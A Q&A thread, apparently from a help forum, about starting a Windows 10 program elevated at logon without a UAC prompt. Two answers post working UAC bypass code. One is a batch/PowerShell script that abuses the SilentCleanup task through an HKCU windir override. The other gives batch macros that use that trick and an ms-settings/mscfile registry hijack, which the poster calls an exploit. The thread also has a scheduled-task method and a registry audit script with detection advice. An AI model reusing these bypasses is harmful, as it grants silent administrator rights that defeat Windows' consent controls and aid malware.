0

I'm currently using a Windows 10 Desktop home computer and I would like to add a program to the startup folder "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup". However, I would like to run the program as administrator. Is there a way to make it run as system/admin without prompting UAC every time the computer loads up? A batch/vbs script is preferable.

Frosty
  • 21

4 Answers

1

I have found a script off the web and modified it so it works as a batch.

if EXIST %temp%\cmd.ps1 (del %temp%\cmd.ps1 /s /q)
echo if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { >> %temp%\cmd.ps1
(
echo cmd /c start cmd.exe
echo } else {
echo     $registryPath = "HKCU:\Environment"
echo    $Name = "windir"
echo    $Value = "powershell -ep bypass -w h $PSCommandPath;#"
echo    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
echo    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I 
echo    Remove-ItemProperty -Path $registryPath -Name $name
echo }
)>> %temp%\cmd.ps1

Powershell.exe -exec bypass -File  %temp%\cmd.ps1

The script creates a PowerShell file with a UAC and execpol bypass; sorry, the code is a little bit botched. Source: https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

Note: If you're not administrator, PowerShell seems to spaz out and reopens itself in a loop.

Frosty
  • 21
0

The only way to do this is to create a Task using Task Scheduler.

From there you can make it run as the user, interactive, with highest privileges, and there won't be a UAC prompt.

The only problem with this approach is that it will consume a bit of extra CPU for as long as the program is running, as Task Scheduler is running at the same time monitoring the output of the program, even if there isn't any.

You may want to look into why this program requires UAC access in the first place, and see if you can avoid it. For example, if the program runs from a location where the user does not have write access to the folder, it will want to run as Administrator too.

LPChip
  • 61,264
  • Is it still not possible even with an external program? – Frosty Apr 23 '19 at 19:00
  • Don't you think, that if it were possible, Microsoft would have a huge security flaw on their hands? Nope, using a scheduled task is already sort of breaking the rules, but in Microsoft's defense, creating the task also requires UAC, but then executing does not have to be, so the security is somewhat reduced. – LPChip Apr 23 '19 at 19:01
  • I have posted working code on my computer, feel free to test it for your self :) – Frosty Apr 23 '19 at 19:28
  • incorrect. SCHTASKS is only one of the auto-elevate executables – ScriptKidd Apr 19 '20 at 08:38
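The scheduled-task approach from the answer above, written out as an added PowerShell example (not code from the answer or from Microsoft): it registers a logon task for the current user with "Run with highest privileges", which is the supported way to start a program elevated at logon without a UAC prompt each time. Registering the task must itself be done from an elevated PowerShell, which is the one-time UAC prompt LPChip mentions. `$ProgramPath` and `$TaskName` are placeholders to substitute.

```powershell
# Added example: register a logon task that starts a program elevated.
# Run this once from an elevated PowerShell (that is the single UAC prompt).
# $ProgramPath and $TaskName are placeholders, not values from the question.

$ProgramPath = 'C:\Tools\MyProgram.exe'     # placeholder: the program to start
$TaskName    = 'MyProgram-ElevatedAtLogon'  # placeholder: any unique task name
$User        = "$env:USERDOMAIN\$env:USERNAME"

# What to run.
$action = New-ScheduledTaskAction -Execute $ProgramPath

# When to run: at logon of this user only.
$trigger = New-ScheduledTaskTrigger -AtLogOn -User $User

# Who runs it: the interactive user, but with the elevated (highest) token,
# which is what removes the per-logon UAC prompt.
$principal = New-ScheduledTaskPrincipal -UserId $User -LogonType Interactive -RunLevel Highest

# Keep the task from being skipped or killed on laptops.
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries

Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
    -Principal $principal -Settings $settings -Force

# Verify: RunLevel should read "Highest" and LogonType "Interactive".
(Get-ScheduledTask -TaskName $TaskName).Principal | Format-List UserId, LogonType, RunLevel
```

Two things to check after registering: `New-ScheduledTaskSettingsSet` applies a default execution time limit of three days, so for a program that is meant to stay running indefinitely set `-ExecutionTimeLimit` accordingly; and, as the answer says, it is worth first confirming the program really needs elevation (for example by moving it out of a folder the user cannot write to) before handing it an elevated token at every logon.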
0

In addition to the Task Scheduler and your answer, you can use the macro style invented by @jeb, @dbenham and DosTips user @Ed Dyreen:

MACRO-EnvBypass.bat: for Windows 8.1&10 (AlwaysNotify Compatible)

@echo off

:: SYNTAX
::::::::::::::::::::::::::::::::::::::::::::::
::  CALL MACRO-EnvBypass.bat                ::
::  %$MACRO.EnvBypass% FILE1 FILE2 FILE3    ::
::::::::::::::::::::::::::::::::::::::::::::::

SETLOCAL DISABLEDELAYEDEXPANSION

::Definitions
( set LF=^
%= EMPTY =%
)
set ^"NL=^^^%LF%%LF%^%LF%%LF%^^"

::Windows Version
for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j
if "%WIN_VER%" NEQ "10.0" (
    echo ERR: VERSION_INCOMPATIBLE
    exit /b 1
)

::Macro

ENDLOCAL &^
set $MACRO.EnvBypass=FOR %%a in (args main) do if "%%a" == "main" (%NL%
    for %%A in (%payload%) do (%NL%
        REG ADD "HKCU\Environment" /v "windir" /d "%%A && REM " /F%NL%
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I%NL%
        REG DELETE "HKCU\Environment" /v "windir" /F%NL%
    )%NL%
) ELSE SETLOCAL ENABLEDELAYEDEXPANSION ^& set payload=,
exit /b

MACRO-elev.bat: for Windows 7~0-day


:: SYNTAX
::::::::::::::::::::::::::::::::::::::::::
::  CALL macro-elev.bat                 ::
::  %$MACRO.elev% FILE1 FILE2 FILE3     ::
::::::::::::::::::::::::::::::::::::::::::

SETLOCAL DISABLEDELAYEDEXPANSION

::Definitions

( set LF=^
%= EMPTY =%
)
set ^"NL=^^^%LF%%LF%^%LF%%LF%^^"

::Windows Version

for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j

if "%WIN_VER%" equ "10.0" (
    set "vuln=ms-settings"
    set "trigger=ComputerDefaults.exe"
) ELSE (
    set "vuln=mscfile" 
    set "trigger=CompMgmtLauncher.exe"
)
set regPath="HKCU\Software\Classes\%vuln%\shell\open\command"

::Macro

ENDLOCAL &^
set $MACRO.elev=FOR %%a in (args main) do if "%%a" == "main" (%NL%
    for %%j in (!payload!) do (%NL%
        reg add %regpath% /d "%%j" /f%NL%
        reg add %regpath% /v DelegateExecute /f%NL%
        %trigger%%NL%
        reg delete "HKCU\Software\Classes\%vuln%" /f%NL%
    )%NL%
) ELSE SETLOCAL ENABLEDELAYEDEXPANSION ^& set payload=,

For how the exploit works, see my full answer here. Make sure to also check out the UACME repository.
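Both macros above work by writing to per-user registry locations that a clean Windows 10 profile does not normally contain: a `windir` value under HKCU\Environment (picked up by the SilentCleanup task) and a per-user `shell\open\command` handler for the `ms-settings` or `mscfile` ProgID. The following added PowerShell check (not part of this answer or of UACME) reads those locations for the current user and reports anything present; it changes nothing and needs no elevation, so it can be run from a logon script or an EDR-style scheduled audit.

```powershell
# Added example: read-only audit of the two per-user registry locations that
# the MACRO-EnvBypass.bat and MACRO-elev.bat techniques write to. Neither
# location exists on a clean Windows 10 profile, so any hit deserves a look.

function Test-UacBypassArtifacts {
    $findings = @()

    # 1. HKCU\Environment\windir: a per-user override of %windir% that the
    #    elevated SilentCleanup task would expand when it runs.
    $envKey = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
    if ($null -ne $envKey -and ($envKey.PSObject.Properties.Name -contains 'windir')) {
        $findings += [pscustomobject]@{
            Location = 'HKCU:\Environment'; Name = 'windir'; Value = $envKey.windir
        }
    }

    # 2. Per-user ProgID handlers consulted before the HKLM definition by the
    #    auto-elevating trigger binaries (ms-settings on Win10, mscfile on Win7).
    foreach ($progId in 'ms-settings', 'mscfile') {
        $key = "HKCU:\Software\Classes\$progId\shell\open\command"
        if (Test-Path -Path $key) {
            $cmd = Get-ItemProperty -Path $key
            $findings += [pscustomobject]@{
                Location = $key; Name = '(Default)'; Value = $cmd.'(default)'
            }
            if ($cmd.PSObject.Properties.Name -contains 'DelegateExecute') {
                $findings += [pscustomobject]@{
                    Location = $key; Name = 'DelegateExecute'; Value = $cmd.DelegateExecute
                }
            }
        }
    }
    return $findings
}

$hits = @(Test-UacBypassArtifacts)
if ($hits.Count -eq 0) {
    'No per-user environment or ProgID hijack artifacts found.'
} else {
    $hits | Format-Table -AutoSize
}
```

Because both macros delete their registry entries immediately after triggering, a point-in-time check like this mostly catches the case where the cleanup step failed or was interrupted. For live coverage, log registry value writes to these same paths (Sysmon event ID 13 with rules on `HKCU\Environment\windir` and `HKCU\Software\Classes\ms-settings\` / `HKCU\Software\Classes\mscfile\`), and alert on an elevated `ComputerDefaults.exe`, `CompMgmtLauncher.exe` or SilentCleanup launch that is shortly preceded by one of those writes.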

0

How about creating a service from the executable, using NSSM, the so-called Non-Sucking Service Manager?

It's very easy to use, if you are sure you know what you are doing...